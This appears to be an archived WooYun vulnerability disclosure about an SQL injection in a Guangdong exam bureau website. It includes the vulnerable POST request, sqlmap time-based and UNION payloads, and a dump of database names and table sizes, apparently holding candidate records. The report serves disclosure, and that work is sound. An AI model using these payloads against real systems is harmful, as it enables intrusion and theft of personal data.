乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-08: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
广东省人事考试局专业技术资格考试网一处SQL注入
http://**.**.**.**/news/news_khsh.asp
查询处:
POST /news/news_hgzs.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://**.**.**.**/news/news_hgzs.aspCookie: counter=112017016; online=x; ASPSESSIONIDSQTSSDCA=JLMJELOBDADKACBAMLEJDCEP; _gscu_2021176043=44158462i7pslc18; _gscs_2021176043=44158462cf2hyu18|pv:1; _gscbrs_2021176043=1; CNZZDATA1255422720=2047127004-1444158464-http%253A%252F%252F**.**.**.**%252F%7C1444158464Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 42title=xxx&content=xxx&Submit3=%C8%B7%C8%CF
直接跑了
sqlmap resumed the following injection point(s) from stored session:---Parameter: title (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: title=xxx';WAITFOR DELAY '0:0:5'--&content=xxx&Submit3=%C8%B7%C8%CF Type: UNION query Title: Generic UNION query (NULL) - 31 columns Payload: title=xxx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(65)+CHAR(80)+CHAR(106)+CHAR(87)+CHAR(99)+CHAR(104)+CHAR(75)+CHAR(81)+CHAR(100)+CHAR(78)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &content=xxx&Submit3=%C8%B7%C8%CF---[03:45:07] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008[03:45:07] [INFO] fetching database names[03:45:07] [WARNING] reflective value(s) found and filtering outavailable databases [20]:[*] Chinaexam_DB[*] chinaexam_web[*] chinaexamda[*] chinaexamwj[*] complain[*] gdkszx[*] gdkszx0801[*] gdkszx_orign[*] HIS_BM[*] km[*] loganalyse[*] master[*] model[*] msdb[*] record_login[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] WSDB[*] wszx
Database: gdkszx+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.kuaiji2005 | 129914 || dbo.construct_b2013 | 91836 || dbo.construct_a2011_qry | 63461 || dbo.construct_two2008 | 28654 || dbo.wszx20090217_orign | 8098 || dbo.jl2007 | 3152 || dbo.jz12010_mon | 2075 || dbo.ghzh2011_bad | 1899 || dbo.zxzh2009 | 1690 || dbo.ghzh2005 | 1105 || dbo.environment2007 | 959 || dbo.pgzh2013 | 824 || dbo.pgzh2010 | 743 || dbo.guanli2008 | 529 || dbo.ngcgh2012 | 224 || dbo.jz2013 | 196 || dbo.ngcym2012 | 43 || dbo.ngcdz2012 | 24 || dbo.subaccount | 1 |+-------------------------+---------+
Database: gdkszx0801+---------------------------+---------+| Table | Entries |+---------------------------+---------+| dbo.kuaiji2005 | 129914 || dbo.construct_a2011_qry | 63461 || dbo.environment2011aaaaaa | 40436 || dbo.construct_two2008 | 28654 || dbo.construct_a2011_qry1 | 12422 || dbo.tax20050823 | 9250 || dbo.wszx20090217_orign | 8098 || dbo.jl2007 | 3152 || dbo.jz12010_mon | 2075 || dbo.ghzh2011_bad | 1899 || dbo.zxzh2009 | 1690 || dbo.qfzh2006 | 1394 || dbo.ghzh2005 | 1105 || dbo.environment2007 | 959 || dbo.pgzh2010 | 743 || dbo.guanli2008 | 529 || dbo.sbjl2010 | 267 || dbo.jz_2010w | 158 || dbo.subaccount | 1 |+---------------------------+---------+
危害等级:高
漏洞Rank:10
确认时间:2015-10-10 15:00
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无